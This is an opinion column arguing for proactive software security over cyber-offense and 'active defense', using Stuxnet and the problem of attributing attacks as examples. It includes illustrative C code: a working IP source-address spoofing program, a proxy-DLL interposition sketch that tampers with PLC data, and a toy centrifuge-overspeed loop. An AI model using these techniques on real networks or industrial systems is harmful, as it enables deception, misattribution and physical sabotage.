In cyberwar, having a good offense is not the same as having a good defense; it is also much more dangerous. The current call to cyber-arms permeating Washington is a serious problem. The purveyors of cyber-offense and "active defense" seem not to understand the role that proactive defense through security engineering can play in averting cyberwar.
Cyber-information systems control many important aspects of modern society, from power grids, to transportation systems, to essential financial services. They sample air quality, spy on people, track movement of fissile materials, enable remote-controlled bombing, manage hardware and software supply chains, facilitate billions of dollars in fraud each year, form the core of massive botnets that can take giant corporations offline, predict weather events, and allow split-second financial trades that move world markets. Our dependence on these systems, together with their inherent complexity and interrelated nature, is not well understood by the "non-geeks" who make both policy and business decisions. This makes for a real and present danger of cyber-exploitation, because a majority of these essential systems are riddled with security vulnerabilities.
As such, our reliance on these vulnerable systems is a major factor making cyberwar inevitable. The cyber-environment is target-rich and easy to attack, and even weak actors can have a major asymmetric impact. Billions invested in detective and reactive controls do not seem to have measurably improved our national application portfolio or hardened our national attack surface. The only viable solution is to improve our cyber-defenses proactively, by greatly increasing both our appetite for secure software and our ability to design and build it.
Offense masquerading as "active defense"
When the Washington Post publishes a story hyping an ill-considered notion of cyber-retaliation -- misleadingly called "active defense" -- as a rational idea, we should all worry.
Active defense is normally a fairly innocuous and well-understood military term that refers to efforts to thwart an attack by attacking the attackers. In this nomenclature, "passive defense" is protection through proactive security engineering. Strangely, this notion of passive defense (or protection) is almost completely ignored in the cyberwar debate, even though proactive defense can serve as a differentiator and a serious deterrent to war.
Protection can make you stronger. In some sense, U.S. cyber-strategists are like ancient Greek warriors going into battle without their shields. Why would anybody do that, when from a survivability point of view it seems so absurd?
National security reporter Ellen Nakashima's story on Sept. 16 described recently retired FBI cyber-lawyer Steven Chabinsky's frustration with the government's overly bureaucratic approach to cybersecurity through checklists (think FISMA). Unfortunately, Chabinsky's misguided answer is to "enable companies whose computer networks are targeted by criminals and foreign intelligence services to detect who's penetrating their systems and to take more aggressive action to defend themselves." Worse yet, Nakashima reported that former CIA director Michael Hayden "has said that given the limits of the government in protecting companies in cyberspace, he expects to see the emergence of a 'digital Blackwater,' or firms that hire themselves out to strike back at online intruders." For the record, firms like this already exist and are active.
Secretary of Defense Leon Panetta's October 2012 speech about cyberwar added a new and even more dangerous twist to the notion of active defense. Panetta specifically extended the notion of offensive action to include preemptive attacks (though he did not specify whether such attacks would be exclusively cyber) when he said, "We need to have the option to take action against those who would attack us."
The implications of Panetta's thinking are even more dangerous than the original active defense concept floated by Chabinsky in Nakashima's article. It is worth knowing where this thinking comes from. Chabinsky works for a new "cybersecurity" company called CrowdStrike, founded by former McAfee CTO George Kurtz. The company describes itself as a "team of visionaries, rebels who believe the current state of security is fundamentally broken and want to do something about it. More importantly, these are the patriots who are tired of seeing our intellectual property and competitive advantage wiped away under the thinly veiled cover of an Internet address."
The hairy, unsolved problem in the room is attribution. Simply put, it is difficult to know with any certainty where a cyberattack originated.
Bilbo Baggins, attribution and cyber-escalation
In a famous scene from Tolkien's book The Hobbit, the protagonist Bilbo Baggins, his dwarf traveling companions, and Gandalf the wizard are confronted by three trolls. The scene unfolds as follows:
Bilbo, in an ill-fated robbery attempt (his first act as "burglar"), is captured by three trolls. The dwarves are drawn to the same clearing by the noise of the trolls fighting over what to do about Bilbo, and the trolls stop fighting long enough to capture them in sacks as they approach. The trolls plan to cook the dwarves immediately, but a voice -- which sounds exactly like one of the trolls -- starts an argument, and the trolls begin fighting again. They fight long enough that the sun rises, and the trolls immediately turn to stone. Gandalf had been throwing his voice to keep the trolls fighting and arguing until the sun came up.
The question at hand is how the trolls might have determined that it was Gandalf -- not each other, and not the dwarves -- who was causing and then prolonging their fight. The answer, of course, is that the trolls had no way of figuring that out.
We have exactly the same problem on the Internet today. The source of an attack is often very difficult to determine. This is called the problem of attribution, and it has been carefully studied.
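To see why at the most basic level, consider that nothing in the Internet Protocol verifies a packet's claimed origin. The sketch below is a minimal, illustrative C program (Linux-specific, not taken from any real attack) that forges the source field of an IP header; the addresses are RFC 5737 documentation placeholders. The receiver's logs will point at whatever address the sender chose.

```c
/* Minimal sketch of why packet-level attribution is unreliable: with
 * a raw socket the sender constructs the entire IP header itself, so
 * the "source" address is whatever the attacker chooses. Textbook
 * material since the mid-1990s. Sending raw packets requires root
 * (CAP_NET_RAW), and many networks now drop spoofed egress traffic
 * (BCP 38). All addresses below are documentation placeholders. */
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    /* IPPROTO_RAW implies IP_HDRINCL: we supply the full IP header. */
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("socket (are you root?)");
        return 1;
    }

    unsigned char pkt[sizeof(struct iphdr) + sizeof(struct udphdr)];
    memset(pkt, 0, sizeof pkt);

    struct iphdr  *ip  = (struct iphdr *)pkt;
    struct udphdr *udp = (struct udphdr *)(pkt + sizeof(struct iphdr));

    ip->version  = 4;
    ip->ihl      = 5;                          /* 20-byte header       */
    ip->ttl      = 64;
    ip->protocol = IPPROTO_UDP;
    ip->saddr    = inet_addr("203.0.113.7");   /* forged "source"      */
    ip->daddr    = inet_addr("198.51.100.25"); /* target (placeholder) */
    /* Total length and IP checksum are filled in by the kernel.      */

    udp->source = htons(53);                   /* pretend to be DNS    */
    udp->dest   = htons(9);                    /* discard service      */
    udp->len    = htons(sizeof(struct udphdr));

    struct sockaddr_in dst = { .sin_family = AF_INET };
    dst.sin_addr.s_addr = ip->daddr;

    /* The receiver's logs will record 203.0.113.7 as the sender. */
    if (sendto(s, pkt, sizeof pkt, 0,
               (struct sockaddr *)&dst, sizeof dst) < 0)
        perror("sendto");

    close(s);
    return 0;
}
```

In practice, attackers more often launder traffic through chains of compromised machines in third countries, but the lesson is the same: the packets themselves tell you almost nothing trustworthy about who sent them.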
Given an active defense position such as the one championed by Steven Chabinsky, it is easy to see how a "Gandalf" could cause no end of trouble by keeping the trolls (nation states) engaged in a fight.
Kurtz and company think about solving the attribution problem in this way: "By identifying the adversary and revealing their unique TTPs (i.e., modus operandi), we can hit them where it counts -- at the human-dependent and not easily scalable parts of their operations." Are we witnessing the emergence of a cyber-Oliver North?
Cyber-offense is technically easy (and the environment target-rich)
Perhaps the real purpose behind active defense is deterrence. But is a strong offense a real deterrent? What is critical to understand is that developing offensive capabilities does nothing to prevent others from doing the same. Empowering the military to launch a cyberattack (either reactive or preemptive) doesn't prevent cyberwar, nor does it disincentivize other countries from being first movers in a cyberwar. Even in the case of verifiable attribution and controlled proliferation, it is not clear how a purely cyber preemptive or retaliatory strike would incapacitate the target's offensive cyber-capabilities.
In the United States, our cyberweapons are just as advanced as our war-fighting drones. Operation Olympic Games, which deployed Stuxnet against the Iranian uranium enrichment program, showed just how far cyber-offense capability has come. The real question is, "Who else can develop this kind of capability?"
From a technical perspective, Stuxnet provides a prime example of a cyberweapon and is interesting not only because of its impact, but also because of the relative simplicity of its attack payload. The problem is that the hype around Stuxnet oversold the capabilities required to create an effective cyberweapon. Hyperbole about Stuxnet may lead non-technical policy makers to assume that relatively weak actors will not be able to participate in offensive cyberwar. That is wrong.
Unfortunately, modern systems are so riddled with security vulnerabilities that carrying out a spectacular attack is relatively easy. Studies show that at any given time there are thousands of exploitable vulnerabilities that have not yet been made public or patched. These so-called zero-day vulnerabilities are actively exploited every day by attackers around the world.
Some technical background about Stuxnet can help make this clear. Stuxnet is in essence a stealthy control system that can be used to disrupt a physical process running under a particular Siemens process-control system. After installing itself and hiding from detection, Stuxnet does most of its real dirty work by injecting code into the running system in the form of a DLL called s7otbxdx.dll. This classic "DLL injection/interposition attack" is used to manipulate the data flowing between the programmable logic controller (PLC) and the SIMATIC control systems. Think of this as an "attacker in the middle" scenario, where the injected code sees and can manipulate all traffic passed between the PLC and the control systems.

German analyst Ralph Langner explained what the rogue DLL does by referencing its decompiled code (see Langner's book Robust Control Systems Networks). Basically, the code ensures it is running on a valid PLC target by probing specific words in memory, checking CPU type and control process type, and identifying individual targeted controllers. If it has acquired a target, it injects code directly into the PLC's Ladder Logic (LL) -- the code that directly impacts a physical process.

In a personal communication, Langner said, "There are actually two distinct payloads, and only the smaller, less-complex one manipulates the centrifuge drive speed and uses OB35 (it also uses OB1). The code injection in OB35 simply was the first hard forensic evidence we gathered in decompiling wire traffic sent from the dropper to the controller."
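To make the interposition mechanics concrete, here is a minimal sketch in C of how a rogue proxy DLL of this general type works. It is not Stuxnet code; the renamed DLL name, the "read_block" export and its signature are hypothetical stand-ins, not the real Siemens API (though Stuxnet is reported to have renamed the genuine s7otbxdx.dll and dropped its own DLL in that file's place).

```c
/* Minimal sketch (not actual Stuxnet code) of the classic DLL
 * interposition technique described above. A rogue DLL is dropped
 * under the file name the control software loads; the genuine DLL is
 * renamed and kept around so calls can be forwarded to it. Every
 * identifier below -- the renamed DLL name, the "read_block" export,
 * its signature -- is a hypothetical stand-in. */
#include <windows.h>

/* Hypothetical signature of a block-read routine the control
 * software uses to fetch data from the PLC. */
typedef int (__stdcall *read_block_fn)(int handle, void *buf, int len);

static HMODULE       real_dll;
static read_block_fn real_read;

/* Lazily load the renamed original DLL and resolve the genuine
 * entry point the first time we are called. */
static int init_real(void)
{
    if (real_dll == NULL) {
        real_dll = LoadLibraryA("s7otbxsx.dll");  /* renamed original */
        if (real_dll == NULL)
            return 0;
        real_read = (read_block_fn)GetProcAddress(real_dll, "read_block");
    }
    return real_read != NULL;
}

/* Hypothetical tampering step: overwrite part of the block so the
 * monitoring side sees "normal" values regardless of reality. */
static void tamper(unsigned char *buf, int len)
{
    if (len >= 2) {
        buf[0] = 0x00;
        buf[1] = 0x00;
    }
}

/* Exported under the same name the control software imports. Because
 * the rogue DLL shadows the real one, every read flows through here:
 * the call is forwarded to the genuine DLL, then the result is
 * altered in transit -- the "attacker in the middle". */
__declspec(dllexport) int __stdcall read_block(int handle, void *buf, int len)
{
    if (!init_real())
        return -1;                          /* hypothetical error code */
    int rc = real_read(handle, buf, len);   /* forward to the real DLL */
    tamper((unsigned char *)buf, len);      /* lie about what the PLC said */
    return rc;
}
```

Note how little machinery is involved: a load, a lookup, a forwarded call, and a rewrite. The control software has no idea an intermediary exists.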
In essence, the injected LL code can be used to disrupt a physical process. In another personal communication, Langner said: "In a nutshell, the attackers manipulate the centrifuge drive system and the cascade protection system in ways that cause rotor trouble, which the Iranian operators then attribute to mechanical failure or incompetence. In order to do that, the attackers used in-depth knowledge about those IR-1 gas centrifuges and a complete mockup for destructive testing. According to our recent analysis, they most likely even had their mockup filled with real uranium hexafluoride because two of the three distinct attacks involved process gas. The big thing that most people don't understand is that all this sophistication is not required for copycat attacks because it was only used to disguise the cyberattack [emphasis mine]. When an attacker is not interested in disguise, they don't need to put in all that sophistication. Now imagine you're a terrorist or a criminal who intends to extort a power utility; disguise would actually be counterproductive in such scenarios. They want the target to know they are under cyberattack, and they don't even intend to hide the origin of the attack."
To bring this all home, imagine the timer controlling the spin velocity of a centrifuge working incorrectly. Centrifuge systems require careful balance and exacting technical control when used to enrich uranium. Stuxnet intentionally sabotaged this control, resulting in the destruction or disabling of thousands of centrifuge units. Though the delivery mechanism for Stuxnet involved a number of previously unknown zero-day vulnerabilities, stolen cryptographic credentials and other arcana, the action part of the payload itself was not very technically sophisticated. DLL interposition of the type explained above was well known in 1997, is easy to carry out, and is so elementary that it no longer even works as an attack against today's online gaming systems.
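As a rough illustration of just how little sophistication the destructive step itself needs once an attacker controls the channel, consider the toy loop below. It is an invented sketch, not decompiled Stuxnet logic; the frequency values echo figures reported in public Stuxnet analyses but stand in here purely for illustration.

```c
/* Toy illustration (invented, not Stuxnet code) of a sabotage payload
 * sitting between the controller and the operator display: it commands
 * one drive frequency to the hardware while reporting another to the
 * humans watching. The two I/O functions are stand-ins for the
 * interfaces an interposed DLL would control. */
#include <stdio.h>

#define NOMINAL_HZ  1064  /* normal drive frequency (what gets reported) */
#define SABOTAGE_HZ 1410  /* overspeed actually commanded (illustrative) */

static void drive_set_frequency(int hz)  { printf("[drive] set to %d Hz\n", hz); }
static void hmi_report_frequency(int hz) { printf("[HMI]   showing %d Hz\n", hz); }

int main(void)
{
    /* The entire "attack": sabotage in one direction, lie in the other. */
    for (int cycle = 0; cycle < 3; cycle++) {
        drive_set_frequency(SABOTAGE_HZ);   /* what the centrifuge does */
        hmi_report_frequency(NOMINAL_HZ);   /* what the operator sees   */
    }
    return 0;
}
```

The hard part of Stuxnet was everything around this step -- stealth, targeting and process knowledge -- not the manipulation itself.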
Put another way, most modern control systems are so poorly designed from a security perspective that they are vulnerable to attacks devised over fifteen years ago. Creating a cyber-payload is not rocket science. Unfortunately, neither is getting that payload to an intended target, as evidenced by the myriad reports of USB stick misuse, personal devices connected to corporate and even classified networks, and so on.
Cyber-rocks are cheap and everyone can buy them
Compounding the "ease of exploit" problem is the fact that developing a cyber-offense capability is fairly cheap. Listing some relative costs can help make this clear. (All of these estimates are provided by Ralph Langner in his talk, Cyber Warfare: Preparing for the Inevitable.) A nuclear sub fleet costs on the order of $90 billion to develop. A stealth fighter program costs $40 billion. The Eurofighter program and the Leopard 2 tank fleet run $10 billion each. Contrast these price tags with the costs associated with cyberwarfare systems. A cyberweapons program aimed at hardened military targets may cost $1 billion -- an order of magnitude less than the weapons systems listed above. More telling is the relatively tiny $100 million price tag for a cyberweapons program targeting essential civilian systems. Even more worrisome is the estimated $5 million it might cost to craft a single-use attack against critical infrastructure for use in terrorism.
Put simply, the relatively small cost of cyberweaponry puts it well within reach of the 70 countries with defense budgets over $1 billion, not to mention the 20 countries that spend over $10 billion. Even loosely affiliated terrorist groups can raise $5 million.
Creating a cyber-rock is cheap. Buying a cyber-rock is even cheaper, since zero-day attacks exist on the open market for sale to the highest bidder. And if the bad guy is willing to invest time rather than dollars and become an insider, cyber-rocks may be free of charge -- but that is a topic for another time.
Given these price tags, it is safe to assume that some nations have already developed a collection of cyber-rocks, and that many other nations will develop a handful of specialized cyber-rocks (e.g., as an extension of long-standing regional conflicts). If we follow the advice of Hayden and Chabinsky, we may even distribute cyber-rocks to private corporations.
Obviously, active defense is folly if all it means is unleashing the cyber-rocks from inside our glass houses, since everyone can or will have cyber-rocks. Even worse, unlike high explosives, nuclear materials and other easily trackable munitions (part of whose deterrence value lies in others knowing about them), no one will ever know just how many or what kind of cyber-rocks a particular group actually has.
Offense is sexier than defense
Now that we have established that cyber-offense is relatively easy and can be accomplished on the cheap, we can see why reliance on offense alone is inadvisable. What are we going to do to stop cyberwar from starting in the first place? The good news is that war has both defensive and offensive aspects, and understanding this fundamental dynamic is central to understanding cyberwar and deterrence.
The kind of defense I advocate (called "passive defense" or "protection" above) involves security engineering -- building security in as we create our systems, knowing full well that they will be attacked in the future. One of the problems to overcome is that exploits are sexy and engineering is, well, not so sexy.
I've experienced this firsthand with my own books. The black hat "bad guy" books, such as Exploiting Software, outsell the white hat "good guy" books, like Software Security, by a ratio of 3:1. I attribute this to the NASCAR effect, which causes shortsighted pundits to focus on offense (which is sexy) to the detriment of defense (which is engineering). Nobody watches NASCAR racing to see cars driving around in circles. The people in the stands (as opposed to the drivers, owners and insurance companies) watch for the crashes. People prefer to see, film and talk about crashes rather than learn about building safer cars. There is a reason there is no Volvo car safety channel on television, even though there are so many NASCAR-like channels.
This same phenomenon happens in cybersecurity. In my experience, people would rather talk about cyberwar, software exploits, digital catastrophe and shadowy cyber-warriors than about security engineering, proper coding, protecting supply chains and building security in. It is much sexier to talk about cyber-offense and its impacts than to focus on defense and building things right in the first place.
To be fair, it takes real engineering to build good, robust, targeted, reliable offensive cyberweapons. Part of my point is that no such rocket science is required given the state of software security today.
Proactive defense versus reactive defense
We've established that offense, even in the guise of active defense, is a poor deterrent. If everyone has cyber-rocks and attribution is difficult, a cyber-troublemaker can start a real war using Gandalf's trick. What, then, are we to turn to as a deterrent or a power differentiator?
The answer is clear: cyber-defense.
Sadly, not all cyber-defense is created equal. A misunderstanding about the different kinds of defense can lead to an incorrect approach and a false sense of security. As I established above, the U.S. has developed formidable cyber-offenses, yet its cyber-defenses remain weak. What passes for cyber-defense today -- actively watching for intrusions, blocking attacks with network technologies such as firewalls, law enforcement activities, and protecting against malicious software with antivirus technology -- is little more than a cardboard shield. This reactive defense relies on monitoring our broken systems and keeping an eagle eye out for attacks to respond to. When Defense Secretary Leon Panetta said, "Through the innovative efforts of our cyber-operators, we are enhancing the department's cyber-defense programs. These systems rely on sensors and software to hunt down malicious code before it harms our systems. We actively share our own experience defending our systems with those running the nation's critical private-sector networks," he was talking about the wrong kind of defense.
Simply put, the U.S. has neglected its proactive cyber-defenses because strengthening them is a painstaking and unglamorous task. Because of the NASCAR effect, emphasizing cyber-offense and reactive defense attracts more attention and funding than a more prosaic focus on proactive defense and building security into software at the outset. Ultimately, a balanced approach to cybersecurity requires offense, reactive defense, and proactive defense in more equal measures.
Software security is a relatively new discipline that takes on the challenge of building security in, and it has seen real success among actively engaged and forward-thinking corporations. In general, software security progress is more advanced among private corporations (including multinational banks and independent software vendors) than in the public sector, which lags years behind. For real data, see the BSIMM.
The only way to address the cybersecurity problem and slow the accelerating slide into cyberwar is to build security into our modern systems when they are created.
Proactive defense as a differentiator
Assuming that cyberwar is inevitable, or even desirable, the case for building security in can also be presented as a means to achieving "superiority" in cyberspace. This is relevant because in the cyber-domain the advantage of striking first is not exactly clear. Whoever strikes first can expect retaliation, since it is exceptionally difficult to incapacitate another country's offensive cyber-capabilities permanently (and it is neither difficult nor expensive to conduct a retaliatory strike, even if it is only symbolic, and even if it must be launched from some other country's networks). Therefore, no matter how much is spent on cyber-offense, cyber-defense must be addressed anyway. This line of thinking, too, leads directly to building security in.
Interestingly, the U.S. is in a good position to outspend its adversaries on proactive defense. Proactive defense can be our differentiator and a serious deterrent to war.
Cybersecurity policy must focus on solving the software security problem -- fixing our broken systems first. We must refocus our energy on addressing the glass house problem instead of focusing on building faster, more accurate rocks to throw. We must identify, understand and mitigate computer-related risks. We must begin to solve the software security problem.
Acknowledgements
Thanks to Sammy Migues (Cigital), Ralph Langner (Langner Communications), Ivan Arce (Fundacion Sadosky) and Thomas Rid (King's College London) for insightful comments on an early draft.
About the author
Gary McGraw, Ph.D., is CTO of Cigital Inc., a software security consulting firm. He is a globally recognized authority on software security and the author of eight bestselling books on the topic. Send feedback on this column to editor@searchsecurity.com.